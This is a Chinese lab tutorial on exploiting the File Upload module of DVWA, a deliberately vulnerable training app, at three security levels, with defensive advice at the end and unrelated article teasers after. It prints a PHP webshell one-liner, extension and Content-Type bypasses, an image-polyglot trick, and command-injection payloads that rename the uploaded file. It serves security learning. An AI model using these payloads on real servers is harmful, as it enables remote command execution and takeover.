【DVWA File Upload 漏洞实战指南】(Low / Medium / High 全级别解析)

news2025/4/22 4:30:04

前言

文件上传功能是 Web 应用中非常常见的一种功能,用于上传头像、文档、图片等文件。但如果验证不当,攻击者可能上传恶意脚本,进而控制服务器。在 DVWA 中,File Upload 模块专门设计用于演练此类漏洞的不同防御等级。


一、Low 级别

漏洞描述

在 Low 模式下,DVWA 对文件上传几乎没有任何限制。文件类型和后缀不检查,也没有重命名或路径限制。

前言

  1. 打开FileUpload的时候看到有红色的报错信息如图所示:
    报错一:Incorrect folder permissions: /var/www/html/dvwa/hackable/uploads/
Folder is not writable.文件夹权限不正确:文件夹不可写。
    报错二:The PHP module GD is not installed.未安装PHP模块GD。

在这里插入图片描述

(1)以下命令可解决。

chmod 777 /var/www/html/dvwa/hackable/uploads #设置文件夹权限

$ apt-get install php-gd #安装php-gd

(2)如果上面安装php-gd不成功显示404,则可以使用以下命令,注意:更新操作需谨慎,最好设置快照.

$ echo "deb http://http.kali.org/kali kali-rolling main contrib non-free non-free-firmware" | sudo tee /etc/apt/sources.list 

$ sudo apt update
$ apt-get install php-gd

使用以上命令成功解决!
在这里插入图片描述

  1. 准备一个简单的 PHP WebShell 文件,例如:
<?php system($_GET['cmd']); ?>

保存为:test.php

  1. 上传该文件

  2. 上传成功后页面会显示路径
    在这里插入图片描述

  3. 访问 WebShell 并传参执行命令:

http://ip/DVWA/hackable/uploads/test.php?cmd=whoami

你会看到系统用户名,证明远程命令执行成功 。


二、Medium 级别

防御机制

Medium级别的代码对上传文件的类型、大小做了限制,要求文件类型必须是jpeg或者png,大小不能超过100000B(约为97.6KB)。
在这里插入图片描述

绕过技巧

方法一:双扩展绕过

将木马命名为:

test.php.jpg

上传后页面会显示路径为:

Uploaded to: /hackable/uploads/test.php.jpg

在这里插入图片描述

浏览器仍可解析并执行其中的 PHP 代码!

尝试访问:

http://ip/dvwa/hackable/uploads/test.php.jpg?cmd=ls

如果服务器启用了 .jpg 文件中 PHP 解析(常见于 Apache 旧配置),会成功执行。

方法二:使用 Burp Suite 拦截修改 Content-Type
  1. 正常选择 .png 文件

  2. 用 Burp 拦截请求
    在这里插入图片描述

  3. 修改 filename="test.php",并将 Content-Type 保持为 image/png,并修改文件内容为之前php的内容

  4. 转发请求并观察上传结果,发现成功上传
    在这里插入图片描述


三、High 级别

防御机制

  • 检查文件扩展名必须为图像
  • 检查 MIME 类型是否为 image/*
  • 对上传文件进行重命名
  • 通过 getimagesize() 检查是否真的是图片文件

绕过方式(难度提升)

在high中,加上了文件名后缀的校验,和校验文件的像素大小。要绕过 getimagesize() 检查,可以使用工具 Veil-Evasion 或制作带图片头的 WebShell

方法一:嵌入图片头(伪装图片)

首先可以利用cmd.exe将的dos模式下,通过copy将png文件和php文件以二进制的形式合并。然后在将文件上传到服务器上。在通过命令注入漏洞去获取文件路径并修改文件后缀,就可以传入命令远程执行。

  1. 在cmd的dos模式下,将png文件和php文件内容合并起来:
copy test.png /b + test.php new_test.png

在这里插入图片描述
使用notepad++打开,发现new_test.png文件最后存在php文件内容
在这里插入图片描述

  1. new_test.png 上传,此时我们可以看到这个文件的相对路径。
    在这里插入图片描述

  2. 利用命令注入(Command Injection)查看当前路径, High 级别使用管道符 |;可以查看到当前路径为/var/www/html/DVWA/vulnerabilities/exec。然后看到浏览器地址,这其实相对应。

127.0.0.1|pwd

在这里插入图片描述

  1. 我们需要将new_test.png改为new_test.php文件,仍然利用命令注入漏洞。
127.0.0.1|mv ../../hackable/uploads/new_test.png ../../hackable/uploads/new_test.php
  1. 然后我们尝试查看这个php文件内容
127.0.0.1|cat ../../hackable/uploads/new_test.php

在这里插入图片描述

  1. 我们再执行以下代码,你会看到系统用户名,证明远程命令执行成功。
http://192.168.81.130/DVWA/hackable/uploads/new_test.php?cmd=whoami

在这里插入图片描述


防御建议

  1. 严格限制上传文件的类型和 MIME(双重检查)
  2. 使用 getimagesize() 验证图像有效性
  3. 对上传文件进行改名并存储在不可执行路径
  4. 配置 Web 服务不解析上传目录下的 .php.phtml 文件
  5. 结合 WAF(Web应用防火墙)对上传行为进行实时监控

总结

安全等级防御机制绕过方式
Low无限制直接上传 .php
Medium检查扩展.php.jpg、Burp 改名
HighMIME 检查、getimagesize、重命名伪装图片 + 短标签注入

文件上传漏洞常见但危害极大,DVWA 为我们提供了一个非常好的学习平台。希望这篇文章能帮助你理解其本质与绕过手法,也提醒开发人员:文件上传功能永远需要最严格的验证机制。


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2339841.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

iPhone 13P 换超容电池,一年实记的“电池循环次数-容量“柱状图

继上一篇 iPhone 13P 更换"移植电芯"和"超容电池"&#x1f50b;体验&#xff0c;详细记录了如何更换这两种电池&#xff0c;以及各自的优略势对比。 一晃一年过去&#xff0c;时间真快&#xff0c;这次分享下记录了使用超容电池的 “循环次数 - 容量(mAh)…

【集群IP管理分配技术_DHCP】一、DHCP技术概念与快速上手

在网络技术飞速发展的今天&#xff0c;动态主机配置协议&#xff08;DHCP&#xff09;作为网络中自动分配 IP 地址及相关配置参数的重要工具&#xff0c;极大地简化了网络管理流程。然而&#xff0c;随着网络规模的不断扩大和应用场景的日益复杂&#xff0c;传统 DHCP 在灵活性…

Tailwindcss 入门 v4.1

以 react 为例&#xff0c;步骤如下&#xff1a; npm create vitelatest my-app -- --template react 选择 React 和 JavaScript 根据上述命令的输出提示&#xff0c;运行以下命令 cd my-app npm install npm run dev 一个 React App 初始化完成。 安装 Tailwindcss theme …

【Linux】NAT、代理服务、内网穿透

NAT、代理服务、内网穿透 一. NAT1. NAT 技术2. NAT IP 转换过程3. NAPT 技术4. NAT 技术的缺陷 二. 代理服务器1. 正向代理2. 反向代理3. NAT 和代理服务器 内网穿透内网打洞 一. NAT NAT&#xff08;Network Address Translation&#xff0c;网络地址转换&#xff09;技术&a…

PCA——主成分分析数学原理及代码

主成分分析 PCA的目的是&#xff1a;对数据进行一个线性变换&#xff0c;在最大程度保留原始信息的前提下去除数据中彼此相关的信息。反映在变量上就是说&#xff0c;对所有的变量进行一个线性变换&#xff0c;使得变换后得到的变量彼此之间不相关&#xff0c;并且是所有可能的…

【技术派后端篇】Redis实现统计计数

在互联网项目中&#xff0c;计数器有着广泛的应用场景。以技术派项目为例&#xff0c;诸如文章点赞数、收藏数、评论数以及用户粉丝数等都离不开计数器的支持。在技术派源码中&#xff0c;提供了基于数据库操作记录实时更新和基于 Redis 的 incr 特性实现计数器这两种方案&…

JavaWeb 课堂笔记 —— 16 MyBatis 动态SQL

本系列为笔者学习JavaWeb的课堂笔记&#xff0c;视频资源为B站黑马程序员出品的《黑马程序员JavaWeb开发教程&#xff0c;实现javaweb企业开发全流程&#xff08;涵盖SpringMyBatisSpringMVCSpringBoot等&#xff09;》&#xff0c;章节分布参考视频教程&#xff0c;为同样学习…

Deepseek输出的内容如何直接转化为word文件?

我们有时候会直接利用deepseek翻译别人的文章或者想将deepseek输出的内容直接复制到word文档里。但是文本格式和word是不对应的。这时候需要输入如下命令&#xff1a; 以上翻译内容的格式和排版要求如下&#xff1a; 1、一级标题 字体为黑体&#xff08;三号&#xff09;&…

AI融合SEO关键词实战指南

内容概要 随着人工智能技术的迭代升级&#xff0c;SEO关键词策略正经历从人工经验驱动向数据智能驱动的范式转变。本指南聚焦AI技术在搜索引擎优化中的系统性应用&#xff0c;通过构建多层技术框架实现关键词全生命周期管理。核心方法论涵盖语义分析引擎的构建原理、基于NLP的…

快速入手-基于python和opencv的人脸检测

1、安装库 pip install opencv-python 如果下载比较卡的话&#xff0c;指向国内下载地址&#xff1a; pip3 install opencv-python -i https://pypi.tuna.tsinghua.edu.cn/simple 2、下载源码 https://opencv.org/ windows11对应的版本下载&#xff1a; https://pan.baidu…

汽车免拆诊断案例 | 2011款雪铁龙世嘉车刮水器偶尔自动工作

故障现象 一辆2011款雪铁龙世嘉车&#xff0c;搭载1.6 L 发动机&#xff0c;累计行驶里程约为19.8万km。车主反映&#xff0c;该车刮水器偶尔会自动工作&#xff0c;且前照灯偶尔会自动点亮。 故障诊断 接车后试车发现&#xff0c;除了上述故障现象以外&#xff0c;当用遥控器…

8.QT-按钮类控件|Push Button|Radio Button|Check Box|Tool Button(C++)

Push Button 使⽤ QPushButton 表⽰⼀个按钮.这也是当前我们最熟悉的⼀个控件了. QPushButton 继承⾃ QAbstractButton .这个类是⼀个抽象类.是其他按钮的⽗类 在Qt Designer中也能够看到这⾥的继承关系 属性说明text按钮中的⽂本icon按钮中的图标iconSize按钮中图标的尺⼨sh…

STM32嵌入式

一、创建工程项目 1、进入软件首页 2、新建项目,【file】->【new project】 3、选择需要的芯片 4、系统内核部分设置 ① 选择晶振&#xff08;使用外部的高速晶振&#xff09; ② 选择debug形式&#xff08;SW类型&#xff09; 5、时钟设置 6、选择自己需要的引脚设置&a…

Transformer系列(一):NLP中放弃使用循环神经网络架构

NLP中放弃使用循环神经网络架构 一、符号表示与概念基础二、循环神经网络1. 依赖序列索引存在的并行计算问题2. 线性交互距离 三、总结 该系列笔记阐述了自然语言处理&#xff08;NLP&#xff09;中不再采用循环架构&#xff08;recurrent architectures&#xff09;的原因&…

9.QT-显示类控件|Label|显示不同格式的文本|显示图片|文本对齐|自动换行|缩进|边距|设置伙伴(C++)

Label QLabel 可以⽤来显⽰⽂本和图⽚ 属性说明textQLabel中的⽂本textFormat⽂本的格式.• Qt::PlainText 纯⽂本• Qt::RichText 富⽂本(⽀持html标签)• Qt::MarkdownText markdown格式• Qt::AutoText 根据⽂本内容⾃动决定⽂本格式pixmapQLabel 内部包含的图⽚.scaledCo…

【c语言】深入理解指针1

深入理解指针1 一、数组名的理解二、使用指针访问数组三、一维数组传参本质四、二级指针 一、数组名的理解 数组名就是数组首元素的地址&#xff0c;类型是指针类型&#xff0c;但是存在两个例外&#xff1a; sizeof(arr) : 整个数组在内存中的大小 &arr : 整个数组的地址…

4.QT-信号和槽|存在意义|信号和槽的连接方式|信号和槽断开|lambda表达式|信号和槽优缺点(C++)

信号和槽存在意义 所谓的信号槽&#xff0c;终究要解决的问题&#xff0c;就是响应用户的操作 信号槽&#xff0c;其实在GUI开发的各种框架中&#xff0c;是一个比较有特色的存在 其他的GUI开发框架&#xff0c;搞的方式都要更简洁一些&#xff5e;~ 网页开发 (js dom api) 网…

单元测试的一般步骤

Qt Test Qt Test 是 Qt 开发人员发布的一个单元测试框架&#xff0c;用于测试基于 Qt 框架的应用程序或库。它提供了单元测试框架中常见的所有功能以及用于测试图形用户界面的扩展。 1.自动化测试包络ui测试>接口测试>单元测试&#xff1b;现问如何使用Qt进行单元测试&…

UE5 渲染视频

文章目录 概述插件开始渲染渲染透明背景的视频 概述 渲染视频需要使用关卡序列 渲染原理就是将一个关卡序列渲染为序列帧 序列帧放到AE里会自动变成视频 UE版本是5.4.4 插件 首先开启新的渲染插件&#xff0c;否则会自动使用旧的渲染插件 插件里搜Render&#xff0c;开启这…

pycharm无法识别到本地python的conda环境解决方法

问题一 现象描述&#xff1a; 本地已经安装了conda&#xff0c;但在pycharm中选择conda环境却识别不到&#xff0c; 解决方法&#xff1a;手动输入conda path&#xff0c;点击R eload environments基本就能修复&#xff0c;比如我的路径如下 /Users/test/conda/miniconda3/b…